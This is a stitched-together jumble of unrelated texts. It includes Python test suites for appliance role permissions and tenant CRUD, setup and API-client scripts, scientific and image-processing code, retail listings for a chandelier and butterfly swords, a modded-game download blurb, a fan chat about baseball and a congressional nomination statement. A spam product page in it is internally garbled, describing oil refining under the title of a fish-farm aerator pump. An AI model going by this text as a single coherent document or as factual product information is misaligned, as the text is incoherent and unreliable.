for name, action_thunk in disallowed_actions.items():
try:
with error.expected(Exception):
action_thunk()
except error.UnexpectedSuccessException:
fails[name] = "{}: {}".format(name, traceback.format_exc())
if fails:
message = ''
for failure in fails.values():
message = "{}\n\n{}".format(message, failure)
raise Exception(message)
finally:
appliance.server.login_admin()
def single_task_permission_test(appliance, product_features, actions):
"""Tests that action succeeds when product_features are enabled, and
fail when everything but product_features are enabled"""
test_permissions(appliance, _mk_role(name=fauxfactory.gen_alphanumeric(),
product_features=[(['Everything'], False)] +
[(f, True) for f in product_features]),
actions,
{})
test_permissions(appliance, _mk_role(name=fauxfactory.gen_alphanumeric(),
product_features=[(['Everything'], True)] +
[(f, False) for f in product_features]),
{},
actions)
@pytest.mark.tier(3)
@pytest.mark.meta(blockers=[1262764])
def test_permissions_role_crud(appliance):
single_task_permission_test(appliance,
[['Everything', cat_name, 'Configuration'],
['Everything', 'Services', 'Catalogs Explorer']],
{'Role CRUD': test_role_crud})
@pytest.mark.tier(3)
def test_permissions_vm_provisioning(appliance):
features = version.pick({
version.LOWEST: [
['Everything', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']
],
'5.6': [
['Everything', 'Compute', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']
]})
single_task_permission_test(
appliance,
features,
{'Provision VM': _test_vm_provision}
)
# This test is disabled until it has been rewritten
# def test_permissions_vm_power_on_access(appliance):
# # Ensure VMs exist
# if not vms.get_number_of_vms():
# logger.debug("Setting up providers")
# infra_provider
# logger.debug("Providers setup")
# single_task_permission_test(
# appliance,
# [
# ['Infrastructure', 'Virtual Machines', 'Accordions'],
# ['Infrastructure', 'Virtual Machines', 'VM Access Rules', 'Operate', 'Power On']
# ],
# {'VM Power On': _test_vm_power_on}
# )
# This test is disabled until it has been rewritten
# def test_permissions_vm_remove(appliance):
# # Ensure VMs exist
# if not vms.get_number_of_vms():
# logger.debug("Setting up providers")
# setup_infrastructure_providers()
# logger.debug("Providers setup")
# single_task_permission_test(
# appliance,
# [
# ['Infrastructure', 'Virtual Machines', 'Accordions'],
# ['Infrastructure', 'Virtual Machines', 'VM Access Rules', 'Modify', 'Remove']
# ],
# {'Remove VM': _test_vm_removal}
# )
# commenting this out, there is validation around the 'no group selected' and we have a test for it
# @pytest.mark.meta(blockers=[1154112])
# def test_user_add_button_should_be_disabled_without_group(soft_assert):
# from cfme.web_ui import fill, form_buttons
# navigate_to(User, 'Add')
# pw = fauxfactory.gen_alphanumeric()
# fill(User.user_form, {
# "name_txt": fauxfactory.gen_alphanumeric(),
# "userid_txt": fauxfactory.gen_alphanumeric(),
# "password_txt": pw,
# "password_verify_txt": pw,
# "email_txt": "test@test.test"
# })
# assert not sel.is_displayed(form_buttons.add), "The Add button should not be displayed!"
@pytest.mark.tier(2)
def test_user_change_password(appliance, request):
user = User(
name="user {}".format(fauxfactory.gen_alphanumeric()),
credential=Credential(
principal="user_principal_{}".format(fauxfactory.gen_alphanumeric()),
secret="very_secret",
verify_secret="very_secret"
),
email="test@test.test",
group=usergrp,
)
user.create()
request.addfinalizer(user.delete)
    request.addfinalizer(appliance.server.login_admin)
with user:
appliance.server.logout()
appliance.server.login(user)
assert appliance.server.current_full_name() == user.name
appliance.server.login_admin()
with update(user):
user.credential = Credential(
principal=user.credential.principal,
secret="another_very_secret",
verify_secret="another_very_secret",
)
with user:
appliance.server.logout()
appliance.server.login(user)
assert appliance.server.current_full_name() == user.name
# Tenant/Project test cases
@pytest.mark.tier(3)
def test_superadmin_tenant_crud(request):
    """Test to verify CRUD operations for CFME tenants
    Prerequisites:
        * This test does not depend on any other test and can be executed against a fresh appliance.
    Steps:
        * Create tenant
        * Update description of tenant
        * Update name of tenant
        * Delete tenant
"""
tenant = Tenant(
name='tenant1' + fauxfactory.gen_alphanumeric(),
description='tenant1 description')
@request.addfinalizer
def _delete_tenant():
if tenant.exists:
tenant.delete()
tenant.create()
with update(tenant):
tenant.description = tenant.description + "edited"
with update(tenant):
tenant.name = tenant.name + "edited"
tenant.delete()
@pytest.mark.tier(3)
@pytest.mark.meta(blockers=[BZ(1387088, forced_streams=['5.7', 'upstream'])])
def test_superadmin_tenant_project_crud(request):
    """Test to verify CRUD operations for CFME projects
    Prerequisites:
        * This test does not depend on any other test and can be executed against a fresh appliance.
Steps:
* Create tenant
* Create project as child to tenant
* Update description of project
* Update name of project
* Delete project
* Delete tenant
"""
tenant = Tenant(
name='tenant1' + fauxfactory.gen_alphanumeric(),
description='tenant1 description')
project = Project(
name='project1' + fauxfactory.gen_alphanumeric(),
description='project1 description',
parent_tenant=tenant)
@request.addfinalizer
def _delete_tenant_and_project():
for item in [project, tenant]:
if item.exists:
item.delete()
tenant.create()
project.create()
with update(project):
project.description = project.description + "edited"
with update(project):
project.name = project.name + "edited"
project.delete()
tenant.delete()
@pytest.mark.tier(3)
@pytest.mark.parametrize('number_of_childrens', [5])
def test_superadmin_child_tenant_crud(request, number_of_childrens):
"""Test CRUD operations for CFME child tenants, where several levels of tenants are created.
    Prerequisites:
        * This test does not depend on any other test and can be executed against a fresh appliance.
Steps:
* Create 5 tenants where the next tenant is always child to the previous one
* Update description of tenant(N-1)_* in the tree
* Update name of tenant(N-1)_*
* Delete all created tenants in reversed order
"""
tenant = None
tenant_list = []
@request.addfinalizer
def _delete_tenants():
# reversed because we need to go from the last one
for tenant in reversed(tenant_list):
if tenant.exists:
tenant.delete()
for i in range(1, number_of_childrens + 1):
new_tenant = Tenant(
name="tenant{}_{}".format(i, fauxfactory.gen_alpha(4)),
description=fauxfactory.gen_alphanumeric(16),
parent_tenant=tenant)
tenant_list.append(new_tenant)
new_tenant.create()
tenant = new_tenant
tenant_update = tenant.parent_tenant
with update(tenant_update):
tenant_update.description = tenant_update.description + "edited"
with update(tenant_update):
tenant_update.name = tenant_update.name + "edited"
for tenant_item in reversed(tenant_list):
tenant_item.delete()
assert not tenant_item.exists
|
Buy aerator for fish farm /aerator pump 008613676951397 - Shandong Microwave Machinery Co.,Ltd.
aerator for fish farm /aerator pump 008613676951397 uses physical methods and chemical processes, according to the different usage and requirements, to remove harmful impurities and unneeded substances from the crude oil, yielding standard oil.
(1) Pump crude oil into the refining tank and heat with conduction oil; the temperature will reach about 70°C-80°C after one hour. Add acid or alkali to separate according to the acid value. After one hour's processing and 4-6 hours' deposit, convey the soap stock to the storage tank.
(3) Put discolored oil into the deodorization tank with a vacuum pump. Heat and process with steam for odor removal.
Shandong Microwave Machinery Co., Ltd. is a Tartary buckwheat dehulling and separating equipment factory specializing in the production of aerator for fish farm /aerator pump 008613676951397, as well as scientific research, manufacturing, installation, and commissioning. Shandong Microwave Machinery Co., Ltd. can provide customers with design and services for 1-2000 tons aerator for fish farm /aerator pump 008613676951397. Shandong Microwave Machinery Co., Ltd. has finished hundreds of successful projects over the years: peanut oil, soybean oil, rapeseed oil, cottonseed oil, sunflower oil, sesame oil, animal oil, grape seed oil, acer truncatum oil, peony seed oil, walnut oil, hemp seed oil, pine oil, tea seed oil, papaya oil, milk thistle seed, and other special types of oil. Shandong Microwave Machinery Co., Ltd. has an independent import and export department, and its equipment has been successfully exported to more than ten countries: Russia, Australia, India, Afghanistan, Cameroon, and so on.
|
#!/usr/bin/python
# Copyright 2011-2012 Nexenta Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from swift_lfs import __version__ as version
name = 'swift_lfs'
setup(
name=name,
version=version,
description='Swift LFS middleware',
license='Apache License (2.0)',
author='Nexenta Systems Inc',
author_email='victor.rodionov@nexenta.com',
url='https://github.com/Nexenta/lfs',
packages=find_packages(exclude=['test_lfs']),
test_suite='nose.collector',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.6',
'Environment :: No Input/Output (Daemon)',
],
requires=['swift(>=1.4.7)'],
entry_points={
'paste.filter_factory': [
'swift_lfs=swift_lfs.lfs:filter_factory',
],
},
)
|
Assistant Editor, Wilma TV/Discovery Studios, Silver Spring, MD.
Associate Producer for Early Light Media, Baltimore, MD.
Communications Associate, AAAS, Washington, D.C.
Contractor/Video Production Assistant at Federal Reserve Board.
Donor Relations, Customer Service and Office Management at Campaign Solutions.
Day Part Manager (Producer) & Administrative Associate Journalist WNEW 99.1FM at CBS Radio.
Digital Content Programmer at FOX Sports.
Education Reporter at KFYR-TV, Bismarck, ND.
Freelance Production Assistant for WPIX-TV, NYC.
High School Sports producer/Digital-Mobile-Social Web producer at WUSA9, Washington, D.C.
Independent Content Quality Editor at Quora.
Multimedia Journalist at News 19, WLTX, Columbia, SC.
News Reporter at Eyewitness News (WEHT/WTVW) in Evansville, In.
Production Assistant with NPR’s “Morning Edition,” Washington, D.C.
Producer, Reporter, Anchor for Univision in Raleigh, NC.
Production Assistant for Big Ten Student U.
Reporter/Photojournalist at WHSV – TV / Gray Television, Staunton, VA.
Social Media Strategist at Society for Science & the Public.
Sports Reporter Laurel TV, Reporter for The Roundball Report, Sideline/Multimedia Reporter for HSRN.
Staff Reporter for the The Daily Review, Bradford and Sullivan counties, PA. and Tioga County, NY.
Video Production Assistant with Zerosun Creative, Denver, CO.
Intern at Sirius XM Radio Inc.
Project Coordinator at Maga Design, Inc.
|
from formica.s3 import temporary_bucket
import pytest
from .constants import STACK
@pytest.fixture
def bucket(mocker, boto_resource, boto_client):
return boto_resource.return_value.Bucket
STRING_BODY = "string"
# MD5 hash of body
STRING_KEY = "b45cffe084dd3d20d928bee85e7b0f21"
BINARY_BODY = "binary".encode()
BINARY_KEY = "9d7183f16acce70658f686ae7f1a4d20"
BUCKET_NAME = "formica-deploy-88dec80484e3155b2c8cf023b635fb31"
FILE_NAME = "testfile"
FILE_BODY = "file-body"
FILE_KEY = "de858a1b070b29a579e2d8861b53ad20"
def test_s3_bucket_context(mocker, bucket, uuid4, boto_client):
bucket.return_value.objects.all.return_value = [mocker.Mock(key=STRING_KEY), mocker.Mock(key=BINARY_KEY)]
boto_client.return_value.meta.region_name = "eu-central-1"
boto_client.return_value.get_caller_identity.return_value = {'Account': '1234'}
mock_open = mocker.mock_open(read_data=FILE_BODY.encode())
mocker.patch('formica.s3.open', mock_open)
with temporary_bucket(seed=STACK) as temp_bucket:
string_return = temp_bucket.add(STRING_BODY)
binary_return = temp_bucket.add(BINARY_BODY)
file_return = temp_bucket.add_file(FILE_NAME)
temp_bucket.upload()
bucket_name = temp_bucket.name
assert string_return == STRING_KEY
assert binary_return == BINARY_KEY
assert file_return == FILE_KEY
assert bucket_name == BUCKET_NAME
bucket.assert_called_once_with(BUCKET_NAME)
assert bucket.call_count == 1
assert mock_open.call_count == 2
location_parameters = {'CreateBucketConfiguration': dict(LocationConstraint='eu-central-1')}
calls = [mocker.call(Body=STRING_BODY.encode(), Key=STRING_KEY), mocker.call(Body=BINARY_BODY, Key=BINARY_KEY), mocker.call(Body=mock_open(), Key=FILE_KEY)]
bucket.return_value.create.assert_called_once_with(**location_parameters)
bucket.return_value.put_object.assert_has_calls(calls)
assert bucket.return_value.put_object.call_count == 3
bucket.return_value.delete_objects.assert_called_once_with(
Delete={'Objects': [{'Key': STRING_KEY}, {'Key': BINARY_KEY}]})
bucket.return_value.delete.assert_called_once_with()
def test_does_not_delete_objects_if_empty(bucket):
bucket.return_value.objects.all.return_value = []
with temporary_bucket(seed=STACK):
pass
bucket.return_value.delete_objects.assert_not_called()
def test_does_not_use_s3_api_when_planning(bucket):
bucket.return_value.objects.all.return_value = []
with temporary_bucket(seed=STACK) as temp_bucket:
temp_bucket.add(STRING_BODY)
temp_bucket.add(BINARY_BODY)
bucket.return_value.create.assert_not_called()
bucket.return_value.put_object.assert_not_called()
bucket.return_value.delete_objects.assert_not_called()
|
Shadow Fight 3 Apk + OBB + Mod unlimited money and gems - Free games and Apps, You Download for Free, A lot Of Top popular Games with Mod Unlocked For Android.
On our site android-1.cc you can easily download all Shadow Fight 3 files without registration and without sending SMS!
Shadow Fight 3 game it all depends on you, because you can build and destroy everything you want.
This game Shadow Fight 3 story will swallow you whole, because you will spend a lot of time creating everything from scratch.
Shadow Fight 3 app colorful graphics and easy management.
Shadow Fight 3 Game Reviews and Download Apps Free. Latest Games Features and Specifications.
|
#!/usr/bin/env python
#encoding: utf-8
import numpy as np
from PIL import Image
def create_data(file):
data_list = []
with open(file, 'r') as f:
for line in f:
line = line.rstrip('\n').split(' ')
feature_dict = {}
for l in line[1:]:
ls = l.split(':')
feature_dict[ls[0]] = ls[1]
data_list.append([line[0], feature_dict])
return data_list
def find_m_index(n):
"""find matrix index giving feature index"""
return (n - 1) / 105, (n - 1) % 105
def find_f_index(x, col):
"""find feature index giving matrix index"""
return x[0] * col + x[1] + 1
def cut_blank(image, filename):
feature = image[1]
# find matrix index and remove noise
matrix_index = {find_m_index(int(f)):float(feature[f]) for f in feature
if float(feature[f]) > 0.35}
if matrix_index:
row_index = [m[0] for m in matrix_index]
col_index = [m[1] for m in matrix_index]
matrix_cut = {(m[0] - min(row_index),m[1] - min(col_index)):matrix_index[m]
for m in matrix_index}
col_range = max(col_index) - min(col_index) + 1
row_range = max(row_index) - min(row_index) + 1
create_image(filename, matrix_cut, row_range, col_range)
else:
create_image(filename, matrix_index, 60, 60)
def create_image(filename, matrix_index, nrow, ncol, normalize=False, t=0):
matrix_init = np.zeros((nrow, ncol))
for i in matrix_index:
if normalize:
if float(matrix_index[i]) > t:
matrix_init[i[0]][i[1]] = 255
else:
matrix_init[i[0]][i[1]] = float(matrix_index[i]) * 255
im = Image.fromarray(matrix_init)
image_name = 'image/' + filename + '.jpg'
im.convert('RGB').save(image_name)
def image_preprocessing(image_data, dir_name):
#image_valid = [image for image in image_data if len(image_data[1])>0]
for idx, image in enumerate(image_data):
filename = dir_name + str(idx) + '_' + str(image[0])
print filename
cut_blank(image, filename)
if __name__ == "__main__":
image_train = create_data('ml14fall_train.dat')
image_test = create_data('ml14fall_test1_no_answer.dat')
image_preprocessing(image_train, 'train/')
image_preprocessing(image_test, 'test/')
|
The hexadecimal color code #242e2f is a dark shade of cyan. In the RGB color model #242e2f is comprised of 14.12% red, 18.04% green and 18.43% blue. In the HSL color space #242e2f has a hue of 185° (degrees), 13% saturation and 16% lightness. This color has an approximate wavelength of 489.54 nm.
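These figures can be reproduced with Python's standard `colorsys` module. The sketch below (the helper name `describe_hex` is ours) recomputes the RGB percentages and the HSL breakdown quoted above; the approximate wavelength is a separate spectral mapping that `colorsys` does not provide.

```python
import colorsys

def describe_hex(code):
    """Break a hex colour like '#242e2f' into RGB percentages and HSL values."""
    # Parse the two-digit hex channels and scale each to the 0-1 range
    r, g, b = (int(code.lstrip('#')[i:i + 2], 16) / 255.0 for i in (0, 2, 4))
    # colorsys returns hue/lightness/saturation in HLS order, each in 0-1
    h, l, s = colorsys.rgb_to_hls(r, g, b)
    return {
        'rgb_pct': (round(r * 100, 2), round(g * 100, 2), round(b * 100, 2)),
        'hue_deg': round(h * 360),
        'saturation_pct': round(s * 100),
        'lightness_pct': round(l * 100),
    }

print(describe_hex('#242e2f'))
# rgb_pct (14.12, 18.04, 18.43), hue 185, saturation 13, lightness 16
```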
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import get_object_or_404
from django.views.generic.detail import DetailView
from .models import Page
from meta.views import MetadataMixin
class MetaTagsMexin(MetadataMixin):
    """Mixin to show meta tags from django-meta"""
def get_meta_description(self, context):
return self.page.meta_description
def get_meta_keywords(self, context):
keywords_str = self.page.meta_keywords
if keywords_str:
return [c.strip() for c in keywords_str.split(',')]
def get_meta_title(self, context):
return self.page.meta_title or self.page.name
class HomePageView(MetaTagsMexin, DetailView):
model = Page
context_object_name = 'page'
template_name = 'page/homepage.html'
def get_context_data(self, **kwargs):
context = super(HomePageView, self).get_context_data(**kwargs)
return context
def get_object(self):
page = get_object_or_404(self.model, slug='home')
self.page = page
return page
class PageDetailView(MetaTagsMexin, DetailView):
model = Page
context_object_name = 'page'
template_name = 'page/default.html'
def get_object(self):
page = get_object_or_404(self.model, path=self.request.path, active=1)
self.page = page
return page
def get_template_names(self):
return ["page/%s.html" % self.page.template]
|
A soft and elegant feather chandelier with brass accents. A stunning centre piece for a stylish interior. Decadent goose feathers create truly soft lighting that is beautifully strokeable. The brass ball chain hangs in a geometric pattern giving a contemporary edge. A pale gold bouclé trim finishes the piece.
Please note the shade does not come with a flex - it attaches to an existing pendant fitting. Takes a single E27 bulb.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created by Zoltan Bozoky on 2014.07.02.
Under GPL licence.
Purpose:
========
Calculate PRE distances.
Note:
=====
The actual pre data is stored as a power of -6 in the bcd file!
"""
# Built-ins
# 3rd party modules
import numpy as np
# Project modules
from disconf.predict.predictor import Predictor
from disconf import fileio
def distance2pre(distance_data):
"""
Convert distance data to pre value stores as -6 power.
Note:
PRE distance: value = pow(distance, -6) <=> distance(value, -1.0/6.0)
"""
#
return np.power(distance_data, -6)
### ======================================================================== ###
def pre2distance(pre_data):
"""
Convert stored PRE value, saved in power(-6) to angstrom
Note:
PRE distance: value = pow(distance, -6) <=> distance(value, -1.0/6.0)
"""
#
return np.power(pre_data, -1.0 / 6.0)
### ======================================================================== ###
class Pre(Predictor):
"""
    PRE distance calculations.
"""
def __init__(self, kwarg):
"""
Parameters:
===========
No extra argument is required!
"""
# ---------------------------------
# Initialize general parameters
# ---------------------------------
Predictor.__init__(self, kwarg)
# ---------------------------------
# Define restraint name
# ---------------------------------
self._name = 'pre'
#
return None
### ==================================================================== ###
def predict(self, pdb_filename, **kwarg):
"""
Calculates the atom - atom distance for PRE fitting
Parameters:
===========
* labels
* coordinates
"""
print ' >>> PARAMAGNETIC RELAXATION ENHANCEMENT BACK CALCULATION'
# ---------------------------------
# Get the structure data
# ---------------------------------
        if (('labels' in kwarg) and ('coordinates' in kwarg)):
            labels = kwarg['labels']
            coordinates = kwarg['coordinates']
        else:
            # Get the coordinates from the pdb file
            labels, coordinates = fileio.read_pdb_file(pdb_filename)
# ---------------------------------
# Extract the residue number and atom name and put into a dictionary
# ---------------------------------
residue_number_atom_name = {}
for i in xrange(len(labels)):
atom_name = labels[i][12:16].strip()
residue_number = int(labels[i][22:26])
residue_number_atom_name[(residue_number, atom_name)] = i
# ---------------------------------
# Container to store the back calculated data
# ---------------------------------
pre_data = np.empty(shape = (self.experimental_data[self.name]['size']),
dtype = np.float32)
# ---------------------------------
        # Iterate through all experimental datapoints
# ---------------------------------
for i in xrange(self.experimental_data[self.name]['size']):
resi1 = self.experimental_data[self.name]['resi1'][i]
atom1 = self.experimental_data[self.name]['atom1'][i]
resi2 = self.experimental_data[self.name]['resi2'][i]
atom2 = self.experimental_data[self.name]['atom2'][i]
# ---------------------------------
# If there is a "#" character indicating the ambiguity in atom1
# ---------------------------------
if '#' in atom1:
# ---------------------------------
# coordinate_1 is the average position of all possible atoms
# ---------------------------------
coordinate_1 = np.zeros(3, dtype = np.float32)
num = 0
for index in ['1', '2', '3', '4']:
if (resi1, atom1.replace('#', index)) in residue_number_atom_name:
coordinate_1 += coordinates[residue_number_atom_name[(resi1, atom1.replace('#', index))]]
num += 1.0
coordinate_1 /= num
else:
coordinate_1 = coordinates[
residue_number_atom_name[(resi1, atom1)]]
# ---------------------------------
# If there is a "#" character indicating the ambiguity in atom2
# ---------------------------------
if '#' in atom2:
# ---------------------------------
                # coordinate_2 is the average position of all possible atoms
# ---------------------------------
coordinate_2 = np.zeros(3, dtype = np.float32)
num = 0
for index in ['1', '2', '3', '4']:
if (resi2, atom2.replace('#', index)) in residue_number_atom_name:
coordinate_2 += coordinates[residue_number_atom_name[(resi2, atom2.replace('#', index))]]
num += 1.0
coordinate_2 /= num
else:
coordinate_2 = coordinates[
residue_number_atom_name[(resi2, atom2)]]
# ---------------------------------
# Calculate the distance between the two coordinates and put on -6
# power
# ---------------------------------
pre_data[i] = distance2pre(np.linalg.norm(
coordinate_1 - coordinate_2))
#
print pdb_filename, ':', len(pre_data), 'distance information extracted'
#
return {'pre': pre_data}
### ==================================================================== ###
### ==================================================================== ###
### ==================================================================== ###
|
WGN radio.... TV will be next week.
Aramfan just texted me...she is at the game, so I'm sure we'll get a full report!
Day one of hopefully a long joyride is underway....buckle those seatbelts!
I've been waiting to put another bad postseason in the past, today is a good start!.
back to back singles with Sori and Theriot.... I like it And Reed with a Web-gem already! Gosh, I missed this!
I just turned on MLB network on TV to make sure the game isn't televised....and just in time to see DeRosa's at bat for the Indians. Oh how i love baseball! And the MLB network .
"W" .....Just 4 months late, I Know; Buzzkill! I'm heading into this season reeeeal slow,sorry-but this has been taking quite a toll on me & my 'ol heart.
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v8.errors",
marshal="google.ads.googleads.v8",
manifest={"FunctionParsingErrorEnum",},
)
class FunctionParsingErrorEnum(proto.Message):
r"""Container for enum describing possible function parsing
errors.
"""
class FunctionParsingError(proto.Enum):
r"""Enum describing possible function parsing errors."""
UNSPECIFIED = 0
UNKNOWN = 1
NO_MORE_INPUT = 2
EXPECTED_CHARACTER = 3
UNEXPECTED_SEPARATOR = 4
UNMATCHED_LEFT_BRACKET = 5
UNMATCHED_RIGHT_BRACKET = 6
TOO_MANY_NESTED_FUNCTIONS = 7
MISSING_RIGHT_HAND_OPERAND = 8
INVALID_OPERATOR_NAME = 9
FEED_ATTRIBUTE_OPERAND_ARGUMENT_NOT_INTEGER = 10
NO_OPERANDS = 11
TOO_MANY_OPERANDS = 12
__all__ = tuple(sorted(__protobuf__.manifest))
|
Sheath: You will get an embossed overseas-made heavy duty leather sheath for each knife, one with a left hand belt loop, the other right. Instead of snaps the retainer strip affixes to a prong. These are made of thick leather. Do not store swords in leather sheaths long term because the chemicals in leather can corrode/tarnish metal.
This is a pair of 2-in-1 Bowie style Butterfly Swords featuring a lenticular/convex grind on the outside and a chisel grind with Urasuki (a concavity) on the inside. This combination of grinds, done well as is the case here, are extraordinarily challenging. The plunge line curves gracefully to the choil and the spine features two scallops. The blade steel is your choice of Böhler 440C or D2 weapons-grade steel (the same kind of steel sold by knife supply houses to U.S. custom knife makers). They were designed by Jeffrey D. Modell of Modell Design LLC (using the Tomb Warrior D Guard Modell Design created for Everything Wing Chun) and made by Forgemaster K. Ali of Ironman Steel. Each blade has his personal logo.
These swords are serious weapons and consequently offered for sale as display swords only AND WE REALLY MEAN IT!
Each product consists of two knives, each with an upgraded heavy duty embossed leather sheath. We can also do a 2-in-1 sheath.
See the Limited Warranty/Legal section of this web-site prior to purchase! While these knives come with our standard warranty, we do not keep them in inventory because of the high cost of construction so they must be special ordered. That means if there is a warranty issue (hopefully not) you should expect a refund or accommodation rather than replacement.
PHOTOGRAPHS: Are of a prior pair with a different handle material than the Arizona Desert Ironwood we currently offer. Taken by us.
©2014 Modell Design LLC. All Rights Reserved. NB: The photographs on this web-site have been copyrighted. It is illegal to copy them. If you want a photo of them for your Butterfly Sword pin-up calendar just ask.
|
import requests
import json
class FullContact(object):
    PERSON_URL = "https://api.fullcontact.com/v2/person.json?email="
    BATCH_URL = "https://api.fullcontact.com/v2/batch.json"
    BATCH_SIZE = 20  # requests per batch call, matching the API's batch limit

    def __init__(self, api_key):
        self.api_key = api_key
        self.url = "https://api.fullcontact.com/v2/person.json"

    def get(self, **kwargs):
        # Fall back to the stored API key unless the caller supplied one.
        kwargs.setdefault('apiKey', self.api_key)
        r = requests.get(self.url, params=kwargs)
        return r.json()

    def change_keys(self, d):
        # Strip the person-endpoint prefix so the keys are bare email addresses.
        return {key[len(self.PERSON_URL):]: value for key, value in d.items()}

    def post(self, email_list):
        data_dict = {}
        request_urls = [self.PERSON_URL + email for email in email_list]
        # Split the requests into batches the endpoint will accept.
        for i in range(0, len(request_urls), self.BATCH_SIZE):
            chunk = request_urls[i:i + self.BATCH_SIZE]
            r = requests.post(
                self.BATCH_URL,
                params={'apiKey': self.api_key},
                headers={'content-type': 'application/json'},
                data=json.dumps({'requests': chunk}))
            data_dict.update(self.change_keys(r.json()["responses"]))
        return data_dict
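The batch call above splits the person-lookup URLs into groups of 20, the per-call limit the code assumes for the batch endpoint. The chunking step itself can be sketched standalone:

```python
def chunk(items, size=20):
    """Split a list into consecutive sublists of at most `size` items."""
    return [items[i:i + size] for i in range(0, len(items), size)]

emails = ["user%d@example.com" % i for i in range(45)]
print([len(c) for c in chunk(emails)])  # [20, 20, 5]
```

The same slicing pattern works for any batched API: iterate over start offsets in steps of the batch size and take one slice per step.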
|
Chairman Webb, Members of the Foreign Relations Committee, it is an honor to appear before you today as President Obama's nominee to be the next Assistant Secretary of State for East Asian and Pacific Affairs.
I am honored and grateful to President Obama and to Secretary Clinton for placing their trust in me and nominating me to serve the United States of America in this position. I would like to both thank and introduce to the committee my family that is with me here today: my wife Lael Brainard, my three daughters Caelan, Ciara and Chloe, my father- and mother-in-law Albert and Joanne Brainard, and many other friends and family members who have come today to provide support. Particular thanks to Albert Brainard who served this nation with great distinction as a diplomat in Europe during the heights of the Cold War.
I've had the good fortune to see Asia from a variety of vantage points over the past 20 years. My first interactions in Asia were as a naval officer serving in Yokosuka, Japan and subsequently as an officer on the Joint Staff. As a treasury official in the early 1990s, I was fortunate to witness firsthand Asia's remarkable economic transformation from a region of developing countries to a critical driver of the global economy. Later, working at the National Security Council and at the Pentagon as the Deputy Assistant Secretary of Defense for Asia and the Pacific, I was able to gain a richer appreciation of the importance of American engagement to the security and stability of Asia. In my time outside of government I have had the chance to return to my roots as a professor and academic working on Asia-Pacific issues in the Washington, D.C. think-tank community and to work in the private sector in the most dynamic region on the globe. The last decade has allowed me to witness the dramatic rise of an increasingly integrated and highly innovative Asia – but nevertheless a region that still relies upon strong American leadership and sound judgment.
I've had the great privilege to work on Asia-Pacific issues for many years and it is a high honor to have the chance to continue to serve at a moment of enormous consequence and opportunity for the United States in Asia.
I approach my nomination with tremendous esteem for the State Department and its highly talented and capable corps of Foreign Service Officers, Civil Service employees, and Locally Engaged Staff, who represent America in Washington and around the world. If confirmed, I will call upon, and support, the first class team that the United States has in all its East Asia and Pacific posts and in the Department.
Mr. Chairman, as I seek your support, and the support of your colleagues, for my nomination, I am mindful of the depth and variety of your experience in Asia. Few are better versed than you in the complex history of the region and, perhaps more importantly, in the increasing criticality of our engagement with Asia. If confirmed, I commit to working closely with you and all the members of the subcommittee and their staffs on promoting a strong and vibrant American engagement in the region.
There should be no doubt that the United States itself is a Pacific nation, and in every regard -- geopolitically, militarily, diplomatically, and economically -- Asia and the Pacific are indispensable to addressing the challenges and seizing the opportunities of the 21st century.
Secretary Clinton's February trip to Asia underscored the Obama Administration's commitment to building even closer partnerships with the region and working with Asia on pressing regional and global issues. If confirmed, I plan to vigorously pursue enhanced engagement with Asia and the Pacific across the full range of bilateral and multilateral activities.
The elements of U.S. power -- hard and soft -- and American influence are broad and multi-faceted. Our stepped up engagement must be so as well. We have enormous opportunity to engage not only governments but also East Asian societies more intensively and creatively, with both traditional tools and new technologies. If confirmed, I will urge our diplomats to take every opportunity to reach out to the people of the Asia-Pacific region through a robust public diplomacy program.
Mr. Chairman, for the last half century, the United States and its allies in the region – Japan, the Republic of Korea, Australia, the Philippines, and Thailand – have maintained security and stability in East Asia and the Pacific. Our alliances remain the bedrock of our engagement in the region, and the Obama Administration is committed to strengthening those alliances to address both continuing and emerging challenges.
Japan is a cornerstone of our security policy in Asia. The May 2006 agreement on defense transformation and realignment will enhance deterrence while creating a more sustainable military presence in the region. The Guam International Agreement, signed by Secretary Clinton during her February trip, carries this transformation to the next stage. We are also working vigorously with our other critical ally in Northeast Asia, the Republic of Korea, to modernize our defense alliance and to achieve a partnership that is truly global and comprehensive in nature.
Japan and the Republic of Korea have been key partners in our joint efforts to maintain peace and stability in Northeast Asia and, in particular, to denuclearize North Korea through the Six-Party process. Recently this process has suffered serious setbacks, with North Korea stepping away from the denuclearization process and instead carrying out a series of provocations including its April 5 missile test and its May 25 announcement of a second nuclear test. As the President said, North Korea's actions blatantly defy U.N. Security Council resolutions and constitute a direct and reckless challenge to the international community, increasing tension and undermining stability in Northeast Asia. If confirmed, I would use close bilateral and trilateral coordination with Tokyo and Seoul to make clear that neither the United States nor its allies will accept a nuclear North Korea. We will also work closely with China in order to coordinate our policies on North Korea. And there should be no mistake: the United States is firm in its resolve to uphold its treaty commitments regarding the defense of its allies.
As we work together to ensure peace and security in the Asia-Pacific region, we must also continue to work with our regional friends and allies to tackle critical global challenges, including the security of Iraq, Afghanistan and Pakistan, energy security and climate change, development and disaster assistance, and responding to the global economic crisis through active leadership in multilateral organizations.
